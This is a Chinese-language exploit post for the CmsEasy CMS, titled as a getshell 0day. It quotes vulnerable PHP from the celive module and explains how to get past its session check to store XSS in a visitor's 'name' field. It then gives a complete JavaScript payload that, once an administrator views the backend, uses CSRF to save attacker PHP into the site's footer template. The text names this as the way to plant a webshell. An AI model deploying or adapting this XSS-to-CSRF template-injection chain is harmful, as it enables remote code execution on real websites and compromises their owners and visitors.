cmseasy getshell 0day

摘要

by zvall
代码如下：
celive/index.php 代码：
[php]
$_SESSION['thislive'] = md5(time());
$_SESSION['thislivetmp'] = $_SESSION['thislive'];

by zvall
代码如下：
celive/index.php 代码：
[php]
$_SESSION['thislive'] = md5(time());
$_SESSION['thislivetmp'] = $_SESSION['thislive'];

if ($config['customer_info']) {
header('Location: '.$config['url'].'/live/?action=0&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));
} else {
header('Location: '.$config['url'].'/live/?action=1&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));
}
[/php]
通过 302 header 到/celive/live/index.php这个地址,而且 $thislive='.$_SESSION['thislive'] 每次访问的值都会不一样.
/celive/live/index.php 代码：
[php]
if(isset($_GET['departmentid'])){
$departmentid=addslashes($_GET['departmentid']);
}else{
$sql = "SELECT `departmentid` FROM `".$config['prefix']."assigns` WHERE 1";
@$result = $GLOBALS['db']->my_fetch_array($sql);
$tatolr=count($result)-1;
$randomr=rand(0,$tatolr);
$departmentid = $result[$randomr]['departmentid'];
}
$timestamp=time();
$name=addslashes($_POST['name']);
$email=addslashes($_POST['email']);
$phone=addslashes($_POST['phone']);
$name=(!empty($name)) ? $name : 'Guest';
$email=(!empty($email)) ? $email : '-';
$phone=(!empty($phone)) ? $phone : '0';
$ip=$_SERVER["REMOTE_ADDR"];
$ip=iconv('gb2312',$GLOBALS['lang']['charset'],$ip);
if(empty($departmentid)) $departmentid=0;
if($_SESSION['thislivetmp']==$_GET['thislive']){
$db->query("INSERT INTO `sessions` (`id` ,`name` ,`email` ,`phone` ,`departmentid` ,`timestamp` ,`ip` ,`status` ) VALUES (NULL , '".$name."', '".$email."', '".$phone."', '".$departmentid."', '".$timestamp."', '".$ip."', '0');");
$sessionid = mysql_insert_id();
$_SESSION['departmentid'] = $departmentid;
$_SESSION['sessionid'] = $sessionid;
$_SESSION['timestamp'] = $timestamp;
$_SESSION['name'] = $name;
}[/php]
$name=addslashes($_POST['name']);这里可以xss 但是他是302 head过来的 。
if($_SESSION['thislivetmp']==$_GET['thislive']) 要绕过这个判断, /celive/live/index.php 只能访问一次，以保证header过去的GET变量
和session[thislivetmp] 一样 and =) produces
java 编程 得到302地址和cookie 构造 post name 为js地址 再 post 到302地址上 ,管理员在查看后台时 ,js触发通过ajax 请求 编辑后台模块插入一句话

csrf插入到模版中的php代码

js代码:

[php]function sendrequest(){  var m=["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"]  if (window.ActiveXObject){   for (var i=0; i<m.length; i++){    try{     return new ActiveXObject(m[i])    }    catch(e){}   }  }else if (window.XMLHttpRequest) {  return new XMLHttpRequest()  }else{  return false  }  } var request=new sendrequest(); var data= "sid=footer_html&slen=2661&scontent=%3C!--+%E9%A1%B5%E5%BA%95+--%3E%0A%3Cdiv+id%3D%22footer%22+class%3D%22mt10%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cdiv+class%3D%22footer%22%3E%0A%3C!--+%E5%8F%8B%E6%83%85logo+--%3E%0A%3Cdiv+class%3D%22links%22%3E%0A%7Bif+%24topid%3D%3D0%7D%0A%7Bloop+friendlink('image'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+title%3D%22%7B%24flink%5Bname%5D%7D%22%3E%3Cimg+src%3D%22%7B%24flink%5Blogo%5D%7D%22+%2F%3E%3C%2Fa%3E%0A%7B%2Floop%7D%0A%7Belse%7D%0A%7Blang(hotkeys)%7D%EF%BC%9A+%7Bgethotsearch(10)%7D%0A%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C!--+%E9%A1%B5%E5%BA%95%E5%AF%BC%E8%88%AA+--%3E%0A%3Cdiv+class%3D%22about%22%3E%0A%3Cimg+src%3D%22%7B%24skin_path%7D%2Fimages%2Ffoot_logo.gif%22+%2F%3E%0A%7Btag_%E7%BD%91%E7%AB%99%E9%A1%B5%E5%BA%95%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC%E7%AD%89%E8%AF%B4%E6%98%8E%7D%0A%7Bif+get('opguestadd')%3D%3D'1'%7D%3Ca+rel%3D%22nofollow%22+href%3D%22%7B%24base_url%7D%2F%3Fg%3D1%22%3E%7Blang(opguestadd)%7D%3C%2Fa%3E+%7C%7B%2Fif%7D%0A%3Ca+href%3D%22%23%22%3ETOP%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%0A%3Cdiv+class%3D%22copyright%22%3E%0A%0A%3C!--+%E9%A1%B5%E5%BA%95%E8%AF%B4%E6%98%8E+--%3E%0A%7Bget(site_right)%7D+%3Ca+title%3D%22%7Bget('sitename')%7D%22+href%3D%22%7B%24base_url%7D%2F%22%3E%7Bget('sitename')%7D%3C%2Fa%3E+All+Rights+Reserved.%C2%A0%C2%A0+%7Bif+get('site_login')%3D%3D'1'%7D%7Blogin_js()%7D%7B%2Fif%7D%0A%3Cdiv+class%3D%22blank5%22%3E%3C%2Fdiv%3E%0A%7Bgetcnzzcount()%7D%C2%A0%C2%A0Powered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%C2%A0%C2%A0%3Ca+rel%3D%22nofollow%22+href%3D%22http%3A%2F%2Fwww.miibeian.gov.cn%2F%22+rel%3D%22nofollow%22+target%3D%22_blank%22%3E%7Bget('site_icp')%7D%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22clear%22%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%7Bif+%24topid%3D%3D0%7D%3C!--+%E7%83%AD%E9%97%A8%E5%85%B3%E9%94%AE%E8%AF%8D+--%3E%0A%3Cdiv+class%3D%22hot_keys%22%3E%0A%3Cstrong%3E%7Blang(hotkeys)%7D%EF%BC%9A%3C%2Fstrong%3E+%7Bgethotsearch(10)%7D%0A%3Cdiv+class%3D%22blank10%22%3E%3C%2Fdiv%3E%0A%3C!--+%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5+--%3E%0A%0A%3Cstrong%3E%7Blang('links')%7D%EF%BC%9A%3C%2Fstrong%3E%0A%7Bloop+friendlink('text'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7B%24flink%5Bname%5D%7D%3C%2Fa%3E%0A%7B%2Floop%7D%0A%0A%3C%2Fdiv%3E%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%7B%24base_url%7D%2Fjs%2Fcommon.js%22%3E%3C%2Fscript%3E%0A%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E+%0A%2F%2F+%E5%85%AC%E5%91%8A%E6%BB%9A%E5%8A%A8js%0Avar+t%3DsetInterval(myfunc%2C1000)%3B+%0Avar+oBox%3Ddocument.getElementById(%22announ%22)%3B+%0Afunction+myfunc()%7B+%0Avar+o%3DoBox.firstChild+%0AoBox.removeChild(o)+%0AoBox.appendChild(o)+%0A%7D+%0AoBox.onmouseover%3Dfunction()%0A%7B%0AclearInterval(t)%0A%7D+%0AoBox.onmouseout%3Dfunction()%0A%7B%0At%3DsetInterval(myfunc%2C2000)%2F%2F%E6%BB%9A%E5%8A%A8%E6%97%B6%E9%97%B4%EF%BC%8C%E9%BB%98%E8%AE%A42%E7%A7%92%0A%7D+%0A%3C%2Fscript%3E%0A%0A%3C!--+%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D+--%3E%0A%7Btemplate+'system%2Fservers.html'%7D%0A%3C!--+%E7%9F%AD%E4%BF%A1+--%3E%0A%7Btemplate+'system%2Fsms.html'%7D%0A%0A%0A%7Bif+get('share')%3D%3D'1'%7D%0A%3C!--+Baidu+Button+BEGIN+--%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshare_js%22+data%3D%22type%3Dslide%26img%3D6%26pos%3Dright%26uid%3D620555%22+%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshell_js%22%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0A%09%09var+bds_config+%3D+%7B%22bdTop%22%3A150%7D%3B%0A%09%09document.getElementById(%22bdshell_js%22).src+%3D+%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Fshell_v2.js%3Ft%3D%22+%2B+new+Date().getHours()%3B%0A%3C%2Fscript%3E%0A%3C!--+Baidu+Button+END+--%3E%0A%7B%2Fif%7D%0A%0A%0A%3Cscript%3E%0Afunction+checkmail(str)%0A%7B%0Avar+strreg%3D%22email%22%3B%0Avar+r%3B%0Avar+strtext%3Ddocument.all(str).value%3B%0A%2F%2Fstrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%5Ba-za-z0-9%5D%2B((.%7C-)%5Ba-za-z0-9%5D%2B)*.%5Ba-za-z0-9%5D%2B%24%2Fi%3B%0Astrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%7B1%7Dw%2B.%7B1%7Dw%7B2%2C4%7D(.%7B0%2C1%7Dw%7B2%7D)%7B0%2C1%7D%2Fig%3B%0Ar%3Dstrtext.search(strreg)%3B%0Aif(r%3D%3D-1)+%7B%0Aalert(%22%E9%82%AE%E7%AE%B1%E6%A0%BC%E5%BC%8F%E9%94%99%E8%AF%AF!%22)%3B%0Adocument.all(str).focus()%3B%0A%7D%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%3C%3Fphp+phpinfo()%3B%3F%3E%EF%BC%9B"; request.open("POST", "/cmseasy/index.php?case=template&act=save&admin_dir=admin&site=default", true); request.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8"); request.send(data)[/php]